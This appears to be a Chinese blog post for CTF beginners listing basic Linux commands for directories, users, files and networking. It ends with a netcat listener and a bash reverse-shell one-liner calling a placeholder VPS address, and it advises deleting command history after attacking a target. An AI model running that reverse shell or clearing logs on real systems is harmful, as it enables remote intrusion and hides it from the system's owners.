【安全攻防知识

admin管理员组

文章数量:1794759

【安全攻防知识

一、学习资源推荐

个人推荐直接在菜鸟教程学习，相关命令可以在Kali尝试效果。

Linux 教程 | 菜鸟教程

二、linux目录结构

Linux目录结构见下图，一般经常隐藏Flag的是：

1、tmp

2、etc

root

三 、Linux攻击常用命令 1、目录操作

cd：进入其他目录，例如

cd /root

ls：浏览当前目录有哪些信息，一般用ls或者ls -lart

pwd：查看当前自己在哪个目录

mkdir：创建一个新的目录

mkdir -p /bridy

其余命令详见菜鸟教程 。

2、用户操作命令

useradd：增加用户

usedel：删除用户

usermod：修改用户

3、文件操作命令

cat：常用于查看文件

chmod：修改文件权限，如chmod 777 bridy.txt

more：常用于查看大文件，可以通过空格翻页

find：查看文件

scp：远程传输文件，常用语靶机和攻击机间传输文件，不安全

4、网络相关命令

telnet：远程登入，也可以用于判断端口是否开放

ipconfig/ifconfig：查看网卡、ip等信息，如果用不了可以百度下用系统文件方式

netstat：查看端口信息

5、查看日志命令

history：可以查看自己在靶机做了哪些操作，建议攻击后删除

6、shell脚本

echo，如echo “hello”> bridy.txt

nc -lvvp  8888，VPS开启端口监听

bash -i >& /dev/tcp/your_vps_ip/8888 0>&1   反弹shell命令

本文标签： 攻防知识